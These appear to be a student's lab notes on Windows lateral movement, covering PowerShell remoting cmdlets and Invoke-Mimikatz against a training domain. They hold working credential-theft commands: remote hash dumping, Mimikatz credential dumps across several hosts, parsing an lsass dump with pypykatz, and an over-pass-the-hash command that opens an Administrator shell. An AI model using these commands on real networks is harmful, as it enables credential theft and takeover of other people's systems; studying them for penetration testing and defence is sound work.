 # Lateral Movement - Powershell Remoting 

 *Think of it as **psexec** on steroids.*
*Powershell remoting is thinking an ability in windows that allow admins to do higher priv stuff conveniently TCP/5985 TCP/5986(SSL)*
- You can find this used in enterprises. Enabled by default on Server 2012 onwards
- You may need to enable remoting (*Enable-PSRemoting*) on a Desktop Windows machine, Admin privs are required to do that.
> Results: You get elevated shell on remote system if admin creds are used to suthenticate (which is default setting)


 - USC issues are not there when we use powershell remoting


## Types
- **One-to-One**
	- PSSession
		- Interactive
		- Runs in a new process
		- Is Stateful
			- untill unless you kill the session your declared variables will remain there.
	- Useful Cmdlets
		- `New-PSSession`
		- `Enter-PSSession`
- One-to-Many
	- Also known as Fan-out remoting\
		- From one machine you can command thousands of machines to do specific task.
	- Non-interactive
		- Can ask it to execute a particular command like we can run ssh to execute specific command on remote machine.
	- Executes commands parallely
	- Useful cmdlets
		- `Invoke-Command`
			- It can also run scripts also where you can specify a file 
			- It needs local admin priv on target machine so it is also helpful to check if we have local admin priv on target machine.
			- Ex:`Invoke-Command -Computername dcorp-adminsrv.dollar.moneycorp.local  -ScriptBlock{whoami;hostname}`
			- Ex:`Invoke-Command -Computername dcorp-adminsrv.dollar.moneycorp.local  -FilePath C:\scripts\Get-PassHashes.ps1`
				- Execute locally loaded function on the remote machine:
					- `${function:Get-PassHashes}`
				- Executing Stateful commands using `Invoke-Command`
				```powershell
					$sess = New-PSSession -Computername Server1
					Invoke-Command -Session $sess -ScriptBlock {$Proc = Get-Process}
					Invoke-Command -Session $sess -ScriptBlock {$Proc.Name}
				 
				 ```
	- The best thing in PowerShell for passing the hashes, using credentials and executing commands on multiple remote computers.
	- Use `-Credential`  parameter to pass username/password.

We can also load functions in `Invoke-Command`
```powershell
. .\hello.ps1
Invoke-Command -ComputerName adm.dcorp.local -ScriptBlock ${function:hello}
```

Content of *hello.ps1*
```powershell
function{
Write-Output "Hello from function"
}
```


# Lateral Movement - Invoke-Mimikatz
- Dump credentials, tickets and more using powershell without dropping exe file 
- Passing and replaying hashes, tickers and for many exciting AD attacks
- Using code from ReflectivePEInjection,mimikatz is loaded reflectively into the memory. All functions of mimikatz could be used from the script
- Needs **ADMIN** privileges to dump credentials from local machine. Need specific privileges which are covered while discussing that attack.
- We can also recover hashes from memory dump (Blackfield HTB)
```bash
pip3 install pypykatz
pypykatz lsa minidump lsaas.DMP
```

```powershell

# Dump credentials on a local machine
Invoke-Mimikatz -DumpCreds

# Dump credentials on multiple remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

```

Mimikatz uses `Invoke-Command` to do above.

- "Over pass the hash" generate tokens from hashes
```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'

# sekurlsa is a module
# user is username
# domain is name 
# ntlm is the provided hash
# run is to specify the command and it is Statefull as it uses Inoke-Command
```
*We can authenticate to Kerberos with NTLM hash using this technique*
# TIPS
- ConstrainedLanguage Mode
	- We cannot run some cmdlets and we cant have types ex: banned .NET classes and we can only use inbuilt cmdlets.
	- Command to find `$ExecutionContext.SessionState.LanguageMode`
- AppLocker is configured then Powershell 5.1 is smart enough to set itself into ConstrainedLanguage mode